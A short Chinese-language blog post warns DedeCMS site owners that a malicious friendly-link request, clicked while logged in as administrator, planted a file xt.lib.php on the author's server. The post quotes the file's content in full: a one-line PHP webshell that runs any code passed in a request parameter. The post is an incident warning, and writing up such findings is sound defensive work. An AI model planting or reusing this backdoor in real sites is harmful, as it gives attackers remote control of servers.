织梦CMS - 轻松建站从此开始!

西安电脑维修

友情链接申请漏洞,dedecms小心不明友情链接申请不要点击

时间:2018-04-29 21:51来源:西安电脑维修网 作者:李超 点击:
很久都没有管理维护的网站,有时候突然登陆发现友情链接列表多出来了一个奇怪的名字,于是就好奇点了一下看看是哪个网站,结果查看代码发现在文件夹生成了一个莫名其妙的文件xt.lib.php,而且打开的并不是一个网站而是我们网站的标签列表,这一连串的敏感数据
很久都没有管理维护的网站,有时候突然登陆发现友情链接列表多出来了一个奇怪的名字,于是就好奇点了一下看看是哪个网站,结果查看代码发现在文件夹生成了一个莫名其妙的文件xt.lib.php,而且打开的并不是一个网站而是我们网站的标签列表,这一连串的敏感数据提醒我有必要登录FTP查看一下生成的是个什么东西。

dedecms友情链接申请漏洞

下载后用Drermwerver打开发现一句话木马:“<?php $s=create_function('',$_REQUEST[x]);$s();?>”,并不知道这个是如何工作的,但是这肯定是一句话后门,网上查了一下更加肯定了。所以千万不要在系统管理员登录的状态下乱点一些乱七八糟的链接,这个是利用了友情链接申请接口摸入后台,然后借用你自己登录的账号权限在网站生成文件,细想一下其实只要你不点击一点事情也没有。 (责任编辑:李超)
织梦二维码生成器
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------